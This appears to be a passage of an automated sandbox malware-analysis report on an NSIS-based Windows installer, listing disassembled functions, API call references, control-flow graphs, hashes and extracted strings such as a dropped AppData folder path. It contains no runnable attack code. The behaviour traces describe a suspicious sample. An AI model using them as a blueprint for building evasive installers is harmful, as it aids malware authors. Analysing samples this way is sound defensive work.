                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: <c${
                                                          • API String ID: 590372296-345804006
                                                          • Opcode ID: d983cdf5f34f6151cad2321293c356f45f3306b1bb5ea95040b854dda8cdae6d
                                                          • Instruction ID: d3b07f9c2581fb6b60ef1a2666babd9f8dcdaaa8066b0d43d813b8afd8e95190
                                                          • Opcode Fuzzy Hash: d983cdf5f34f6151cad2321293c356f45f3306b1bb5ea95040b854dda8cdae6d
                                                          • Instruction Fuzzy Hash: 03B159B0900608FFDF11AF60DD89AAE7B79FB48355F00813AFA45BA1A0C7785A51DF58
                                                          Function 6FC41BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6FC412BB: GlobalAlloc.KERNEL32(00000040,?,6FC412DB,?,6FC4137F,00000019,6FC411CA,-000000A0), ref: 6FC412C5
                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FC41D2D
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6FC41D75
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6FC41D7F
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC41D92
                                                          • GlobalFree.KERNEL32(?), ref: 6FC41E74
                                                          • GlobalFree.KERNEL32(?), ref: 6FC41E79
                                                          • GlobalFree.KERNEL32(?), ref: 6FC41E7E
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC42068
                                                          • lstrcpyW.KERNEL32(?,?), ref: 6FC42222
                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6FC422A1
                                                          • LoadLibraryW.KERNEL32(00000008), ref: 6FC422B2
                                                          • GetProcAddress.KERNEL32(?,?), ref: 6FC4230C
                                                          • lstrlenW.KERNEL32(00000808), ref: 6FC42326
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0
                                                          • Opcode ID: b9e3c165712929bca43d486d815d07f7021f44d2931561c2772efefce4255d9f
                                                          • Instruction ID: a117f8081e58c7f092c16355d4379ebc74cead4ef916c4ad6260229a1c735063
                                                          • Opcode Fuzzy Hash: b9e3c165712929bca43d486d815d07f7021f44d2931561c2772efefce4255d9f
                                                          • Instruction Fuzzy Hash: 6C22BD71D0460ADADB12CFADC9952EEBBF0FF05319F10462AD1A5E6280F770AA95CB50
                                                          Function 00405C83 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 671 405c83-405ca9 call 405f4e 674 405cc2-405cc9 671->674 675 405cab-405cbd DeleteFileW 671->675 677 405ccb-405ccd 674->677 678 405cdc-405cec call 406577 674->678 676 405e3f-405e43 675->676 679 405cd3-405cd6 677->679 680 405ded-405df2 677->680 684 405cfb-405cfc call 405e92 678->684 685 405cee-405cf9 lstrcatW 678->685 679->678 679->680 680->676 683 405df4-405df7 680->683 686 405e01-405e09 call 4068d4 683->686 687 405df9-405dff 683->687 688 405d01-405d05 684->688 685->688 686->676 694 405e0b-405e1f call 405e46 call 405c3b 686->694 687->676 691 405d11-405d17 lstrcatW 688->691 692 405d07-405d0f 688->692 695 405d1c-405d38 lstrlenW FindFirstFileW 691->695 692->691 692->695 711 405e21-405e24 694->711 712 405e37-405e3a call 4055fc 694->712 697 405de2-405de6 695->697 698 405d3e-405d46 695->698 697->680 702 405de8 697->702 699 405d66-405d7a call 406577 698->699 700 405d48-405d50 698->700 713 405d91-405d9c call 405c3b 699->713 714 405d7c-405d84 699->714 703 405d52-405d5a 700->703 704 405dc5-405dd5 FindNextFileW 700->704 702->680 703->699 707 405d5c-405d64 703->707 704->698 710 405ddb-405ddc FindClose 704->710 707->699 707->704 710->697 711->687 715 405e26-405e35 call 4055fc call 406337 711->715 712->676 724 405dbd-405dc0 call 4055fc 713->724 725 405d9e-405da1 713->725 714->704 716 405d86-405d8f call 405c83 714->716 715->676 716->704 724->704 728 405da3-405db3 call 4055fc call 406337 725->728 729 405db5-405dbb 725->729 728->704 729->704
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CAC
                                                          • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CF4
                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D17
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D1D
                                                          • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D2D
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                          • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                          • API String ID: 2035342205-4063877507
                                                          • Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                          • Instruction ID: 26a84cf893ecfac7fe2d2a8ab9ced37764d13583991ceadb599b2dfedf858990
                                                          • Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                          • Instruction Fuzzy Hash: 8E41B030800A18B6CB21AB65DC4DAAF7778EF42718F10813BF851711D1DB7C4A82DEAE
                                                          Function 004068D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                          • FindClose.KERNELBASE(00000000), ref: 004068EB
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp, xrefs: 004068D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 2295610775-469814226
                                                          • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                          • Instruction ID: 1cf04926a4a3889f6b92b588199f87985a57aa1d1812818edfb9113e4ef6e03f
                                                          • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                          • Instruction Fuzzy Hash: 53D012725162209BC240673CBD0C84B7A58AF253317518A3AF46AF61E0DB348C639699
                                                          Function 00403FF7 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 202 403ff7-404009 203 404170-40417f 202->203 204 40400f-404015 202->204 206 404181-4041c9 GetDlgItem * 2 call 4044f6 SetClassLongW call 40140b 203->206 207 4041ce-4041e3 203->207 204->203 205 40401b-404024 204->205 210 404026-404033 SetWindowPos 205->210 211 404039-404040 205->211 206->207 208 404223-404228 call 404542 207->208 209 4041e5-4041e8 207->209 221 40422d-404248 208->221 213 4041ea-4041f5 call 401389 209->213 214 40421b-40421d 209->214 210->211 216 404042-40405c ShowWindow 211->216 217 404084-40408a 211->217 213->214 238 4041f7-404216 SendMessageW 213->238 214->208 220 4044c3 214->220 222 404062-404075 GetWindowLongW 216->222 223 40415d-40416b call 40455d 216->223 224 4040a3-4040a6 217->224 225 40408c-40409e DestroyWindow 217->225 234 4044c5-4044cc 220->234 231 404251-404257 221->231 232 40424a-40424c call 40140b 221->232 222->223 233 40407b-40407e ShowWindow 222->233 223->234 227 4040a8-4040b4 SetWindowLongW 224->227 228 4040b9-4040bf 224->228 235 4044a0-4044a6 225->235 227->234 228->223 237 4040c5-4040d4 GetDlgItem 228->237 242 404481-40449a DestroyWindow EndDialog 231->242 243 40425d-404268 231->243 232->231 233->217 235->220 241 4044a8-4044ae 235->241 244 4040f3-4040f6 237->244 245 4040d6-4040ed SendMessageW IsWindowEnabled 237->245 238->234 241->220 246 4044b0-4044b9 ShowWindow 241->246 242->235 243->242 247 40426e-4042bb call 4065b4 call 4044f6 * 3 GetDlgItem 243->247 248 4040f8-4040f9 244->248 249 4040fb-4040fe 244->249 245->220 245->244 246->220 274 4042c5-404301 ShowWindow KiUserCallbackDispatcher call 404518 EnableWindow 247->274 275 4042bd-4042c2 247->275 252 404129-40412e call 4044cf 248->252 253 404100-404106 249->253 254 40410c-404111 249->254 252->223 257 404147-404157 SendMessageW 253->257 258 404108-40410a 253->258 254->257 259 404113-404119 254->259 257->223 258->252 262 404130-404139 call 40140b 259->262 263 40411b-404121 call 40140b 259->263 262->223 271 40413b-404145 262->271 272 404127 263->272 271->272 272->252 278 404303-404304 274->278 279 404306 274->279 275->274 280 404308-404336 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404338-404349 SendMessageW 280->281 282 40434b 280->282 283 404351-404390 call 40452b call 403fd8 call 406577 lstrlenW call 4065b4 SetWindowTextW call 401389 281->283 282->283 283->221 294 404396-404398 283->294 294->221 295 40439e-4043a2 294->295 296 4043c1-4043d5 DestroyWindow 295->296 297 4043a4-4043aa 295->297 296->235 298 4043db-404408 CreateDialogParamW 296->298 297->220 299 4043b0-4043b6 297->299 298->235 300 40440e-404465 call 4044f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->300 299->221 301 4043bc 299->301 300->220 306 404467-40447a ShowWindow call 404542 300->306 301->220 308 40447f 306->308 308->235
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                          • ShowWindow.USER32(?), ref: 00404053
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                          • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                          • DestroyWindow.USER32 ref: 00404092
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                          • GetDlgItem.USER32(?,?), ref: 004040CA
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                          • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                          • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                          • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                          • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                          • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042DE
                                                          • EnableWindow.USER32(?,?), ref: 004042F9
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                          • EnableMenuItem.USER32(00000000), ref: 00404316
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                          • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                          • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                          • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: <c
                                                          • API String ID: 121052019-1732094670
                                                          • Opcode ID: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction ID: 8cad316efbf8f9c89f6feec2797fb874042f4abab253e3557332251604c97906
                                                          • Opcode Fuzzy Hash: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction Fuzzy Hash: C6C1A1B1500204BBDB206F61EE89E2B3AA8FB85755F01453EF751B51F0CB39A8529B2D
                                                          Function 00403C49 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 309 403c49-403c61 call 40696b 312 403c63-403c73 call 4064be 309->312 313 403c75-403cac call 406445 309->313 322 403ccf-403cf8 call 403f1f call 405f4e 312->322 318 403cc4-403cca lstrcatW 313->318 319 403cae-403cbf call 406445 313->319 318->322 319->318 327 403d8a-403d92 call 405f4e 322->327 328 403cfe-403d03 322->328 334 403da0-403dc5 LoadImageW 327->334 335 403d94-403d9b call 4065b4 327->335 328->327 329 403d09-403d31 call 406445 328->329 329->327 336 403d33-403d37 329->336 338 403e46-403e4e call 40140b 334->338 339 403dc7-403df7 RegisterClassW 334->339 335->334 340 403d49-403d55 lstrlenW 336->340 341 403d39-403d46 call 405e73 336->341 352 403e50-403e53 338->352 353 403e58-403e63 call 403f1f 338->353 342 403f15 339->342 343 403dfd-403e41 SystemParametersInfoW CreateWindowExW 339->343 347 403d57-403d65 lstrcmpiW 340->347 348 403d7d-403d85 call 405e46 call 406577 340->348 341->340 346 403f17-403f1e 342->346 343->338 347->348 351 403d67-403d71 GetFileAttributesW 347->351 348->327 355 403d73-403d75 351->355 356 403d77-403d78 call 405e92 351->356 352->346 362 403e69-403e83 ShowWindow call 4068fb 353->362 363 403eec-403eed call 4056cf 353->363 355->348 355->356 356->348 368 403e85-403e8a call 4068fb 362->368 369 403e8f-403ea1 GetClassInfoW 362->369 367 403ef2-403ef4 363->367 370 403ef6-403efc 367->370 371 403f0e-403f10 call 40140b 367->371 368->369 375 403ea3-403eb3 GetClassInfoW RegisterClassW 369->375 376 403eb9-403edc DialogBoxParamW call 40140b 369->376 370->352 372 403f02-403f09 call 40140b 370->372 371->342 372->352 375->376 380 403ee1-403eea call 403b99 376->380 380->346
                                                          APIs
                                                            • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                            • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                          • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00008001), ref: 00403CCA
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D4A
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D68
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres), ref: 00403DB1
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                          • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                          • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-509749328
                                                          • Opcode ID: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction ID: c722afd28cb3ad108a11d8546cd61d6ece1c23d3a169ae69e987cf65e7f86a01
                                                          • Opcode Fuzzy Hash: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction Fuzzy Hash: 7961C370500700BED620AF66AD46F2B3A6CEB85B5AF40053FF945B22E2DB7C5941CA6D
                                                          Function 004030A2 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406067 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406577 call 405e92 call 406577 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034f4 398->400 401 40314e 398->401 409 40327f-403287 call 40303e 400->409 410 40315f-403166 400->410 401->400 405 40322a-403242 call 40350a call 4034f4 402->405 406 40324c-403276 GlobalAlloc call 40350a call 4032d9 402->406 403->388 405->403 429 403244-40324a 405->429 406->403 434 403289-40329a 406->434 409->403 414 4031e2-4031e6 410->414 415 403168-40317c call 406022 410->415 419 4031f0-4031f6 414->419 420 4031e8-4031ef call 40303e 414->420 415->419 432 40317e-403185 415->432 425 403205-40320d 419->425 426 4031f8-403202 call 406a58 419->426 420->419 425->398 433 403213 425->433 426->425 429->403 429->406 432->419 438 403187-40318e 432->438 433->396 435 4032a2-4032a7 434->435 436 40329c 434->436 439 4032a8-4032ae 435->439 436->435 438->419 440 403190-403197 438->440 439->439 441 4032b0-4032cb SetFilePointer call 406022 439->441 440->419 442 403199-4031a0 440->442 446 4032d0 441->446 442->419 443 4031a2-4031c2 442->443 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->419 449 4031de-4031e0 447->449 448->433 448->447 449->419
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004030B3
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QNuQ5e175D.exe,00000400), ref: 004030CF
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040311B
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-3729504802
                                                          • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction ID: 55eb758a8cc994b5b8f5e8324c308f37a69edd03a8198e206d37cac48cd63750
                                                          • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction Fuzzy Hash: E9519171900204AFDB209FA5DD86B9E7EACEB09356F20417BF504B62D1C7789F408BAD
                                                          Function 004065B4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
